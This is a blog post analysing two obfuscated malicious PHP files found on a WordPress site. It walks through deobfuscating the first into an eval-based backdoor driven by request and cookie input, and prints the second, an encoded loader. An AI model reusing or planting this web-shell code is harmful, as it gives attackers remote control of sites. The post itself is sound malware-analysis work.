DEV Community

🐁
🐁

Posted on

Malicious PHP I found on a colleague's website 🦠

#php #whitehat #vim

TL;DR: Colleague sent me two 'malicious php' files he found from his wordpress website. I detail below how I deobfuscated the malicious code and found their domain which they post information to: indikateit.ru

Today, my colleague messaged me whilst I was on my commute to work, asking me to take a look at a 'potentially malicious' php file which he had found on his personal website.

The code was:

<?php
    $anthropological= '$ii'; $former= 'e';$bach = 'BiTT(?U';$encumbers = ']s_(S]w)$'; $cards = 'Qac';$invokes ='K';
    $lagging = '_';

    $cautioned =']'; $evensong = '1d4_'; $blustering= '4[e';$besmirch = ' ,fp)a;';$lemma = 'aA';$indicter= 'as)/EvtSd';$cantankerously = 't'; $espoused='uCtEPOqa';$investigation = 'r';$juicy ='7r'; $desmond= ')';$countermeasure='_';$indemnify = 'lQOV';
    $injections ='lye'; $backarrows ='r';$gaillardia='@';$lime ='Z,';$apprentice= 'g'; $captains ='R';$blameworthy = ')tL"';$dragnet = 's';

    $evicting= ')'; $cleaved ='<(I'; $cap = '@$eqo$_Q[';
    $corroborating = 're'; $enemas= 'a'; $data='9'; $hetty = '_'; $buttocks ='?';
    $lambert='gsad)';$hinze='d'; $infra= 'e';
    $glib= 'e0U6A__dP';$evades='e';$bandies='d';$barret = '8["uXDa(v';$broach= 'Tn'; $impetuous= '"i';$clari='i';$bren = 'bI$'; $iceberg= '"';$cheetah= '='; $haydon = 't_u';$he= ':,ascna":';$insights='eHl';
    $fanni='_';$heeded ='gaG'; $cranberry= 'L';$drench = 'vfi;udf-b'; $devin= '_';$lumps= 'J';$bunkhouse= '[UKRTi?CN'; $brutality =')wD'; $contaminates= 't';
    $astronomer= 'r$'; $leavened ='a'; $logicians= 'VrD+)(^';$catlaina= 'H';$annihilation=']TH';$indeed ='eW:'; $animadvert= 'MoW;r';$extrude = 'E'; $bobafett ='tc>Ql';
    $collection='o'; $blest = 'acYi*r'; $franco= ';';$farmer= '2'; $avenue = 'rs';$angelle ='"L)';

    $fornication ='cd(.=e';$junkerdom = 'mE]$R$['; $kyle ='$';$flapping ='n'; $dialup= 'e';$javelins='Re(e(=@s';
    $consider='W'; $headache ='5ADvrUs';$counsellors= 'T';
    $ewoks= 'b'; $bellies =')';$kippie = ')bO';$basalt='FBEa';$colorers= 'r'; $duane ='_'; $jeremiah ='6(yD$3(E';$exterminated= '"pe"';$bungled='ie;(P`@';

    $chrysler ='BS'; $gnni = $fornication['0'] .

    $colorers . $bungled['1'] .$basalt['3'] . $bobafett['0'] . $bungled['1'] .$duane.$drench['6']. $drench['4'].$flapping .$fornication['0'] . $bobafett['0'] .$bungled[0]. $collection .$flapping;
     $cracking=$besmirch['0'] ;$flowcharting= $gnni($cracking, $bungled['1'] . $headache['3'] .$basalt['3'] . $bobafett['4'] .$bungled['3'].$bungled['6'].$basalt['3'] . $colorers.$colorers. $basalt['3']. $jeremiah['2'].$duane. $exterminated['1']. $collection.
    $exterminated['1'].

    $bungled['3']. $drench['6'].
    $drench['4'] .$flapping.

    $fornication['0'] . $duane . $heeded['0'] .$bungled['1'] . $bobafett['0'] . $duane .$basalt['3'].$colorers .$heeded['0'] . $headache['6'] . $bungled['3'].$kippie[0]. $kippie[0] . $kippie[0]. $bungled['2'] );
    $flowcharting($cap['3'] ,$exterminated['1'], $drench['7'], $animadvert['0'] ,$bungled['1'] ,

    $indicter['3'],$jeremiah['4'].$bungled[0]. $javelins['5'] .$bungled['6'].

    $basalt['3']. $colorers . $colorers. $basalt['3'].$jeremiah['2']. $duane. $junkerdom['0'] .$bungled['1']. $colorers.$heeded['0'] . $bungled['1']. $bungled['3'] . $jeremiah['4']. $duane .

    $javelins['0']. $jeremiah['7'].$bobafett[3].$headache['5'] . $jeremiah['7'] .$chrysler['1'].$counsellors .$he['1'].$jeremiah['4'] .
    $duane . $bunkhouse[7] .
    $kippie['2'] .$kippie['2'] . $bunkhouse['2'] .$bren['1'] .
    $jeremiah['7'].$he['1'] . $jeremiah['4'] . $duane .$chrysler['1'] .$jeremiah['7'] . $javelins['0']. $logicians['0'].$jeremiah['7'].$javelins['0'].

    $kippie[0] .$bungled['2'].$jeremiah['4'].$basalt['3'] .$javelins['5'].$bungled[0].$headache['6'] . $headache['6'] . $bungled['1'] . $bobafett['0'] . $bungled['3'] .$jeremiah['4']. $bungled[0]. $junkerdom['6']. $exterminated[3].$brutality['1'] .$bobafett['4'] .$cap['3'] .
    $basalt['3'] .
    $drench['4'] .$fornication['1'] .

    $fornication['1'] .$kippie['1'] .$exterminated[3] .

    $junkerdom['2'].$kippie[0].

    $bunkhouse['6'] . $jeremiah['4'].$bungled[0].$junkerdom['6']. $exterminated[3] .

    $brutality['1'] .$bobafett['4'] . $cap['3'].$basalt['3'] .$drench['4'].

    $fornication['1'] . $fornication['1'] .$kippie['1'] .$exterminated[3].$junkerdom['2'].
    $indeed['2'].

    $bungled['3']. $bungled[0] .$headache['6'] . $headache['6'] . $bungled['1'] .$bobafett['0'].$bungled['3'].
    $jeremiah['4'].$bungled[0].

    $junkerdom['6'] .$exterminated[3]. $annihilation['2'].$counsellors .

    $counsellors .$bungled['4'] .$duane . $consider.$angelle['1'] .$bobafett[3] .$headache['1']. $headache['5'] .

    $jeremiah['3'].$jeremiah['3']. $chrysler['0'] .$exterminated[3] .
    $junkerdom['2'] .
    $kippie[0]. $bunkhouse['6'] . $jeremiah['4'] . $bungled[0] . $junkerdom['6']. $exterminated[3].$annihilation['2'] . $counsellors. $counsellors.$bungled['4'] .

    $duane . $consider. $angelle['1'].
    $bobafett[3].

    $headache['1']. $headache['5'].$jeremiah['3'].$jeremiah['3'].$chrysler['0'] . $exterminated[3] .
    $junkerdom['2']. $indeed['2']. $fornication['1'] . $bungled[0] . $bungled['1'] .$kippie[0] . $bungled['2'] .

    $bungled['6'].$bungled['1'].
    $headache['3'] .$basalt['3'].$bobafett['4'].$bungled['3'].$headache['6'] . $bobafett['0'] . $colorers.$colorers .$bungled['1'].$headache['3'] . $bungled['3'] .
    $kippie['1'] . $basalt['3'].$headache['6'] .$bungled['1'] .$jeremiah['0'] .

    $blustering['0']. $duane.
    $fornication['1'].$bungled['1'] .$fornication['0'] .$collection .$fornication['1'].$bungled['1'].
    $bungled['3'] .
    $headache['6']. $bobafett['0'] . $colorers.$colorers .$bungled['1'].

    $headache['3'] . $bungled['3']. $jeremiah['4'].

    $basalt['3'] .
    $kippie[0] . $kippie[0] .$kippie[0]. $kippie[0] .$bungled['2']);
Enter fullscreen mode Exit fullscreen mode

My first thought was to google search the filename, which was oqjpuqbi.php.

Nothing came up.

I then googled the file content itself.

Nothing came up.

I realised that the code was probably randomised, so if someone had the same code it would have different variable names, and variables which pointed to different strings.

My first thoughts were to try an online php deobfuscation tool.

This helped space things out but the strange variables, e.g. bobafett, enemas & fornication still remained.

It was clear that these variables referenced strings, which would then be concatenated togather to form instructions, potentially malicious instrutctions.

I then copy-pasted this more readable and spaced-out php code into vim, used some regex to transform the php syntax into javascript, then made sure that the javascript that I would then run in my browser console was just limited to printing concatenated strings.

This is the resulting code which I would run:


 var anthropological='ii';
var former='e';
var bach='BiTT(?U';
var encumbers=']s_(S]w)';
var cards='Qac';
var invokes='K';
var lagging='_';
var cautioned=']';
var evensong='1d4_';
var blustering='4[e';
var besmirch=' ,fp)a;';
var lemma='aA';
var indicter='as)/EvtSd';
var cantankerously='t';
var espoused='uCtEPOqa';
var investigation='r';
var juicy='7r';
var desmond=')';
var countermeasure='_';
var indemnify='lQOV';
var injections='lye';
var backarrows='r';
var gaillardia='@';
var lime='Z,';
var apprentice='g';
var captains='R';
var blameworthy=')tL"';
var dragnet='s';
var evicting=')';
var cleaved='<(I';
var cap='@eqo_Q[';
var corroborating='re';
var enemas='a';
var data='9';
var hetty='_';
var buttocks='?';
var lambert='gsad)';
var hinze='d';
var infra='e';
var glib='e0U6A__dP';
var evades='e';
var bandies='d';
var barret='8["uXDa(v';
var broach='Tn';
var impetuous='"i';
var clari='i';
var bren='bI';
var iceberg='"';
var cheetah='=';
var haydon='t_u';
var he=':,ascna":';
var insights='eHl';
var fanni='_';
var heeded='gaG';
var cranberry='L';
var drench='vfi;udf-b';
var devin='_';
var lumps='J';
var bunkhouse='[UKRTi?CN';
var brutality=')wD';
var contaminates='t';
var astronomer='r';
var leavened='a';
var logicians='VrD+)(^';
var catlaina='H';
var annihilation=']TH';
var indeed='eW:';
var animadvert='MoW;r';
var extrude='E';
var bobafett='tc>Ql';
var collection='o';
var blest='acYi*r';
var franco=';';
var farmer='2';
var avenue='rs';
var angelle='"L)';
var fornication='cd(.=e';
var junkerdom='mE]R[';
var kyle='';
var flapping='n';
var dialup='e';
var javelins='Re(e(=@s';
var consider='W';
var headache='5ADvrUs';
var counsellors='T';
var ewoks='b';
var bellies=')';
var kippie=')bO';
var basalt='FBEa';
var colorers='r';
var duane='_';
var jeremiah='6(yD3(E';
var exterminated='"pe"';
var bungled='ie;(P`@';
var chrysler='BS';
var gnni= fornication[0] + colorers + bungled[1] + basalt[3] + bobafett[0] + bungled[1] + duane + drench[6] + drench[4] + flapping + fornication[0] + bobafett[0] + bungled[0] + collection + flapping;
cracking=besmirch[0];
//flowcharting=gnni(cracking,bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2]);
var another_string = bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+exterminated[1]+collection+exterminated[1]+bungled[3]+drench[6]+drench[4]+flapping+fornication[0]+duane+heeded[0]+bungled[1]+bobafett[0]+duane+basalt[3]+colorers+heeded[0]+headache[6]+bungled[3]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`another_string is ${another_string}`);
var finalStr = cap[3]+exterminated[1]+drench[7]+animadvert[0]+bungled[1]+indicter[3]+jeremiah[4]+bungled[0]+javelins[5]+bungled[6]+basalt[3]+colorers+colorers+basalt[3]+jeremiah[2]+duane+junkerdom[0]+bungled[1]+colorers+heeded[0]+bungled[1]+bungled[3]+jeremiah[4]+duane+javelins[0]+jeremiah[7]+bobafett[3]+headache[5]+jeremiah[7]+chrysler[1]+counsellors+he[1]+jeremiah[4]+duane+bunkhouse[7]+kippie[2]+kippie[2]+bunkhouse[2]+bren[1]+jeremiah[7]+he[1]+jeremiah[4]+duane+chrysler[1]+jeremiah[7]+javelins[0]+logicians[0]+jeremiah[7]+javelins[0]+kippie[0]+bungled[2]+jeremiah[4]+basalt[3]+javelins[5]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+brutality[1]+bobafett[4]+cap[3]+basalt[3]+drench[4]+fornication[1]+fornication[1]+kippie[1]+exterminated[3]+junkerdom[2]+indeed[2]+bungled[3]+bungled[0]+headache[6]+headache[6]+bungled[1]+bobafett[0]+bungled[3]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+kippie[0]+bunkhouse[6]+jeremiah[4]+bungled[0]+junkerdom[6]+exterminated[3]+annihilation[2]+counsellors+counsellors+bungled[4]+duane+consider+angelle[1]+bobafett[3]+headache[1]+headache[5]+jeremiah[3]+jeremiah[3]+chrysler[0]+exterminated[3]+junkerdom[2]+indeed[2]+fornication[1]+bungled[0]+bungled[1]+kippie[0]+bungled[2]+bungled[6]+bungled[1]+headache[3]+basalt[3]+bobafett[4]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+kippie[1]+basalt[3]+headache[6]+bungled[1]+jeremiah[0]+blustering[0]+duane+fornication[1]+bungled[1]+fornication[0]+collection+fornication[1]+bungled[1]+bungled[3]+headache[6]+bobafett[0]+colorers+colorers+bungled[1]+headache[3]+bungled[3]+jeremiah[4]+basalt[3]+kippie[0]+kippie[0]+kippie[0]+kippie[0]+bungled[2];
console.log(`final str is ${finalStr}`);
Enter fullscreen mode Exit fullscreen mode

What got logged out was:

another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_RundefinedQUundefinedST,3_COOKIundefined,3_SundefinedRVundefinedR);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Enter fullscreen mode Exit fullscreen mode

Immediately, I noticed the undefined in the string which was logged.

Upon a review of the code, I realized that the alleged malicious actor had made a mistake:

jeremiah[7] returns null because it is of length 7 and hence it can not index something which does not exist.

I then appended the last character once more to jeremiah to make sure it was length 7, then ran in my browser again.

The output this time was:

another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3iundefined"wloauddb"])?3iundefined"wloauddb"]:(isset(3iundefined"HTTP_WLQAUDDB"])?3iundefined"HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Enter fullscreen mode Exit fullscreen mode

Now this looked a lot better. rubs hands

As you can see, there was is now another undefined outputted.

This is from the junkerdom, which is of length 5, yet the code is asking for a character at index 6.

This is clearly supposed to be another square bracket, namely, [.

When fixed, the output is:

another_string is eval(@array_pop(func_get_args())); debugger eval code:100:9
final str is op-Me/3i=@array_merge(3_REQUEST,3_COOKIE,3_SERVER);3a=isset(3i["wloauddb"])?3i["wloauddb"]:(isset(3i["HTTP_WLQAUDDB"])?3i["HTTP_WLQAUDDB"]:die);@eval(strrev(base64_decode(strrev(3a))));
Enter fullscreen mode Exit fullscreen mode

This looks a lot better.

At the end of the above output, it string reverses 3a->a3 then base64 decodes it which gives k.

Update: my friend gave me another file he found on his website named goldafunder.php. A google search of this filename presented no results.

This was the file:

<?php $PZOGngRGYdWpGi="3K4hbIR80HU_5VL1MzAqr6GgewJPjOsC9f7uFYnixvSydaNTkDX2ctlZpomQWEB";$wzEaCfiPhwFdUF=$PZOGngRGYdWpGi[4] .$PZOGngRGYdWpGi[45].  $PZOGngRGYdWpGi[30].  $PZOGngRGYdWpGi[24]. $PZOGngRGYdWpGi[21]  .$PZOGngRGYdWpGi[2] .$PZOGngRGYdWpGi[11] .$PZOGngRGYdWpGi[44] .$PZOGngRGYdWpGi[24].  
$PZOGngRGYdWpGi[52].  $PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[44].$PZOGngRGYdWpGi[24];$xWqBnKmIZCRbJ=$PZOGngRGYdWpGi[30]. $PZOGngRGYdWpGi[53]. $PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[24]  .$PZOGngRGYdWpGi[41];$IUCaEKgNOPd=$PZOGngRGYdWpGi[24].  
$PZOGngRGYdWpGi[20] .$PZOGngRGYdWpGi[20] . $PZOGngRGYdWpGi[57].  
$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[11].$PZOGngRGYdWpGi[20].$PZOGngRGYdWpGi[24].  $PZOGngRGYdWpGi[56]  .$PZOGngRGYdWpGi[57] .$PZOGngRGYdWpGi[20]. $PZOGngRGYdWpGi[53]  .$PZOGngRGYdWpGi[39]  .$PZOGngRGYdWpGi[38]. $PZOGngRGYdWpGi[23];$TiCkLZuka=$PZOGngRGYdWpGi[52] .$PZOGngRGYdWpGi[20].  
$PZOGngRGYdWpGi[24] .$PZOGngRGYdWpGi[45] . $PZOGngRGYdWpGi[53] .$PZOGngRGYdWpGi[24]  .$PZOGngRGYdWpGi[11].  $PZOGngRGYdWpGi[33] .$PZOGngRGYdWpGi[35] . $PZOGngRGYdWpGi[38].  $PZOGngRGYdWpGi[52]. $PZOGngRGYdWpGi[53].$PZOGngRGYdWpGi[39] .$PZOGngRGYdWpGi[57].$PZOGngRGYdWpGi[38];$IUCaEKgNOPd(0);$HTIRyzRYNNT=$TiCkLZuka("",$wzEaCfiPhwFdUF($xWqBnKmIZCRbJ("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